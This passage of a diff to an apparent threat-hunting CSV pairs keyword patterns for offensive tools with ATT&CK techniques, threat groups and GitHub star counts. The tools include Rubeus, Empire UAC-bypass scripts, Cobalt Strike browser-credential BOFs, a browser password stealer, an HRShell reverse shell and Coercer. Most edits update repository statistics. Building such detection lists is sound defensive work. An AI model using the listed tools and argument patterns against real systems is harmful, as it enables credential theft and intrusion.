Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* charlotte.cpp*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"* charlotte.dll *","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "* CharSubroutine-Macro.xls*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" -"* -CheckShareAccess -Verbose*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"* --check-tor *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"* -ChildPath *fodhelper.exe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - 
Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-FodHelperBypass.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* -ChildPath *sdclt.exe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SDCLTBypass.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* chimera.py *","offensive_tool_keyword","Chimera","Automated DLL Sideloading 
Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","280","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" -"* chimera.sh*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"* chimera_automation *.exe*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","280","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"* -CheckShareAccess -Verbose*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"* --check-tor *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* -ChildPath *fodhelper.exe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-FodHelperBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -ChildPath *sdclt.exe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SDCLTBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* chimera.py *","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"* chimera.sh*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"* 
chimera_automation *.exe*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" "* chrome logindata *","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "* chrome masterkey *","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "* chromium_based_browsers.py*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" 
@@ -309,81 +309,81 @@ "* client.py -s http*:5000 --cert /*.pem*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "* clock-skew.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* Clone_Token /Process:* /Command:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" -"* cloud_enum.py*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","6","10","1238","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" -"* cloudsploit*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. 
These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","0","N/A","N/A","10","2921","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" -"* cmedb","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* cloud_enum.py*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" +"* cloudsploit*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. 
These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","0","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" +"* cmedb","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* coap-resources.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -cobalt *","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "* cobaltstrike*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 
- T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"* coerce * --dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* coerce -u * -p * --listener-ip*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"* Coercer.py*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation 
tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" +"* coerce * --dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* coerce -u * -p * --listener-ip*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"* Coercer.py*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" "* CoffeeExecuteFunction*","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","0","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z" "* collect activedirectory --*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","0","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" -"* --collectallproperties*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --CollectionMethod All *ldap*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --CollectionMethod All *--ZipFileName *.zip*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* -CollectionMethod All*loggedon*","offensive_tool_keyword","bloodhound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. 
Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1552 - T1027 - T1059 - T1087","TA0003 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" -"* -CollectionMethod LoggedOn -Verbose*","offensive_tool_keyword","bloodhound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1552 - T1027 - T1059 - T1087","TA0003 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" -"* -CollectionMethod stealth*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
